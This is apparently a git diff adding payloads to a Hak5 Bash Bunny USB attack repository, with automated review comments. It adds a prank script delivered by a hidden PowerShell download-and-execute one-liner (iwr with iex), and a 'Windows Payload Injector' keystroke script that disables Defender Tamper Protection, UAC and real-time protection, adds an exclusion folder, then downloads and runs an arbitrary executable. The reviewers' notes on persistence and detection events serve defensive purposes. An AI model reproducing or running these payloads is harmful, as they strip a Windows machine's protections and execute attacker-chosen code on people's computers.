diff --git a/docs/readme.txt b/docs/readme.txt index ed0b9437..04f8598f 100644 --- a/docs/readme.txt +++ b/docs/readme.txt @@ -6,7 +6,7 @@ Bash Bunny by Hak5 USB Attack/Automation Platform - -+- QUICK REFERENCE GUIDE v1.4 -+- + -+- QUICK REFERENCE GUIDE v1.5 -+- +-----------------+ @@ -107,6 +107,8 @@ $HOST_IP IP Address of the Bash Bunny (Default: 172.16.64.1) $SWITCH_POSITION "switch1", "switch2" or "switch3" + $BB_LABEL Volume name of the BashBunny + when mounted. @@ -153,6 +155,8 @@ GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME GET HOST_IP Returns $HOST_IP GET SWITCH_POSITION Returns $SWITCH_POSITION + GET TARGET_OS Returns $TARGET_OS + GET BB_LABEL Returns $BB_LABEL diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh index 0ebd6e7d..791ad2c0 100755 --- a/payloads/extensions/get.sh +++ b/payloads/extensions/get.sh @@ -26,6 +26,10 @@ function GET() { [[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return export TARGET_OS='UNKNOWN' ;; + "BB_LABEL") + export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }') + ;; + esac } diff --git a/payloads/library/prank/cApS-Troll/README.md b/payloads/library/prank/cApS-Troll/README.md new file mode 100644 index 00000000..d7011865 --- /dev/null +++ b/payloads/library/prank/cApS-Troll/README.md @@ -0,0 +1,105 @@ +
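Review bot: The new `"BB_LABEL")` arm in payloads/extensions/get.sh takes the label from column 9 of `ls -l`, which depends on the listing format, and because the command substitution sits on the `export` line a failed lookup is hidden behind a zero exit status. Names under /dev/disk/by-label are also udev-escaped (a space appears as `\x20`), so the exported value may differ from the volume name the readme describes; that should be confirmed or documented. A glob avoids the parsing: `for l in /dev/disk/by-label/*; do [[ "$(readlink "$l")" == */nandf ]] && export BB_LABEL="${l##*/}"; done`. GET's body starts outside the hunk.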

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
  2. +
  3. Getting Started
  4. +
  5. Contributing
  6. +
  7. Version History
  8. +
  9. Contact
  10. +
  11. Acknowledgments
  12. +
+
+ +# cApS-Troll + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Description + +This payload is meant to prank your victim with TURNING on AND off CAPS LOCK + +## Getting Started + +### Dependencies + +* Dropbox or other file sharing service +* Windows 10,11 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Device will download the file and place them in proper directories to then run the script +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here: + +[atomiczsec](https://github.com/atomiczsec) & +[I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube +
+ + Python + +
Twitter +
+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/prank/cApS-Troll/a.ps1 b/payloads/library/prank/cApS-Troll/a.ps1
new file mode 100644
index 00000000..fa7129c1
--- /dev/null
+++ b/payloads/library/prank/cApS-Troll/a.ps1
@@ -0,0 +1,17 @@
+while (1){
+Start-Sleep -Second 45
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+Start-Sleep -Second 15
+$wsh = New-Object -ComObject WScript.Shell
+$wsh.SendKeys('{CAPSLOCK}')
+}
\ No newline at end of file
diff --git a/payloads/library/prank/cApS-Troll/payload.txt b/payloads/library/prank/cApS-Troll/payload.txt
new file mode 100644
index 00000000..9dc8ab8f
--- /dev/null
+++ b/payloads/library/prank/cApS-Troll/payload.txt
@@ -0,0 +1,18 @@
+REM Title: cApS-Troll
+
+REM Author: atomiczsec
+
+REM Description: This payload is meant to prank your victim with TURNING on AND off CAPS LOCK
+
+REM Target: Windows 10
+
+"URL='http://example.com/powershell.ps1?dl=1'"
+
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL ; iex $pl
+QUACK ENTER
+
+REM Remember to replace the link with your DropBox shared link for the intended file to download in the URL variable
+REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
diff --git a/payloads/library/remote_access/Windows-Payload-Injector/payload.txt b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt
new file mode 100644
index 00000000..eb7a55e5
--- /dev/null
+++ b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt
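Review bot: cApS-Troll/a.ps1 has no header comment and its `while (1)` loop never ends, so nothing in the file tells the owner of the machine what it does or how to stop it; a first line such as `# Toggles Caps Lock on a timer; runs until the hosting powershell.exe process is ended` would cover that. As a style point, the five identical stanzas each recreate the `WScript.Shell` COM object, which could be created once before the loop. `-Second` only works as an abbreviation of `-Seconds` and is clearer spelled out.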
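Review bot: The `QUACK STRING` line in cApS-Troll/payload.txt executes whatever the link returns through `iwr ... ; iex`, and the placeholder on the `URL` line uses plain `http://`, so what runs on the target is not tied to the a.ps1 shipped in this directory and can be changed by anyone who controls the link or the network path. The header should state that, for example `REM Note: the target executes unverified remote content; host the script on an https link you control and record its hash`. The hidden-window `-w h -NoP -NonI -ep Bypass` command line is a common detection signature, which is worth mentioning in the README so the system owner knows what to look for in process logs.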
@@ -0,0 +1,85 @@
+#!/bin/bash
+#
+# Title: Microsoft Windows Payload Injector
+#
+# Description:
+# 1) Disables Tamper Protection in Windows Defender.
+# 2) Disables UAC / Turns UAC off
+# 3) Creates Payload Directory in C:/ Drive
+# 4) Disables Real-Time Protection in Windows Defender.
+# 5) Adds the Payload Directory as an exclusion in Windows Defender
+# 6) Downloads Payload from Specified URI (Enter in Variable Below)
+# 7) Runs Payload on System
+#
+# Author: KryptoKola
+# Version: 1.0
+# Category: Remote Access
+# Target: Microsoft Windows 10 & 11
+
+LED SETUP
+ATTACKMODE HID
+#Variables
+readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
+
+#Disables Tamper Protection in Windows 10 & 11
+LED STAGE1
+Q GUI s
+Q STRING "Virus & threat protection"
+Q ENTER
+Q DELAY 10000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q ENTER
+Q DELAY 1000
+Q TAB
+Q TAB
+Q TAB
+Q TAB
+Q SPACE
+Q DELAY 1000
+Q ALT y
+Q DELAY 1000
+Q ALT F4
+Q FN ALT F4
+
+#Starts Powershell in Admin mode
+LED STAGE2
+Q GUI r
+Q DELAY 250
+Q STRING powershell Start-Process powershell -Verb runAs
+Q ENTER
+Q DELAY 3000
+Q ALT y
+Q DELAY 5000
+
+#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
+LED STAGE3
+Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
+Q ENTER
+Q DELAY 1500
+Q ALT y
+Q DELAY 250
+
+#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
+LED STAGE4
+Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
+Q ENTER
+Q DELAY 2000
+
+#Launches the Payload on the machine
+LED STAGE5
+Q STRING ./payload.exe
+Q ENTER
+Q DELAY 250
+
+#Clears the shell and exits out.
+LED CLEANUP
+Q STRING clear
+Q ENTER
+Q DELAY 250
+Q STRING exit
+Q ENTER
+
+LED FINISH
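Review bot: The `LED CLEANUP` stage in Windows-Payload-Injector/payload.txt only clears and closes the shell, so after the run the target is left with `ConsentPromptBehaviorAdmin` at 0, real-time monitoring off, a Defender exclusion on `C:/Payloads` and Tamper Protection disabled. The header comment should list these as persistent changes that must be reverted after an authorised test, for example `# NOTE: leaves the UAC prompt, Defender real-time protection, the exclusion list and Tamper Protection modified; restore them after the engagement`. The same list is what defenders can alert on: Microsoft Defender operational events 5001 and 5007 and a write to that registry value.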